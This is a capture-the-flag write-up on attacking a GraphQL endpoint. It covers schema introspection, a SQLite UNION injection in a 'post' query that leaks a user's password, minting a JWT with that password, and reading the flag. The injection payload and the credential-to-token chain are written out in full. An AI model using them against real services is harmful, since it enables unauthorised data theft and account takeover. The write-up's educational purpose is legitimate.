After we started searching, we found GraphQL on /graphql. With big payload from PayloadsAllTheThings we can get all the information out of it. For convenience, we can use "GraphQL Voyager" extension in Burpsuite. Request: ``` {"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ","variables":null} ``` The information we received from the response we can put to https://apis.guru/graphql-voyager/ and get an easy-to-view graph. ![](https://user- images.githubusercontent.com/83348650/133906491-7e76d659-ed62-4174-acb3-1953a4cfdb84.png) In this graph we see that we have "flag" query. Let's try to send a request: ``` query { flag } ``` But we get in response: ``` "message":"error authenticating user: invalid token" ``` After spending a lot of time on Google and looking for information about GraphQL, and sending a large number of requests, we found SQLite injection on post query: ``` query UserQuery{ post (name:"' union select 1,2,3,password,5,6 from users --") { content } } ``` response: ``` "content":"n8bboB!3%vDwiASVgKhv" ``` From the posts on the site we found name of the author - congon4tor. Now we have credentials congon4tor:n8bboB!3%vDwiASVgKhv Need to get token with this credentials. With the help of my teammate jelly7183 request: ``` query { __schema { types { name,fields { name, args { name,description,type { name, kind, ofType { name, kind } } } } } } } ``` response: ``` "name":"authenticateUser" ``` Now need to send request with mutation to authenticateUser. request: ``` mutation { authenticateUser(username:"congon4tor", password:"n8bboB!3%vDwiASVgKhv"){token} } ``` response: ``` "token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjQ5MjksImlhdCI6MTYzMTk5MjEyOSwiaXNzIjoiQ29uZ29uNHRvciJ9.ObmWd65tvTGUOIAIo1u4XmiScZE00tvA7Gu_Dtm1cpQ" ``` Great, now we have a token, it remains to form a normal request to "flag" query. Add this header to HTTP request: ``` Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjE1NzIsImlhdCI6MTYzMTk4ODc3MiwiaXNzIjoiQ29uZ29uNHRvciJ9.Gqllh1rt_OHVcTWMfRREZy0pKPRxhlsvxQFw6Wu0rxE ``` and set ``` query { flag } ``` and we have flag in response: ``` "flag":"flag{9d26b6e4a765ecd87fe03a1494c22236}" ```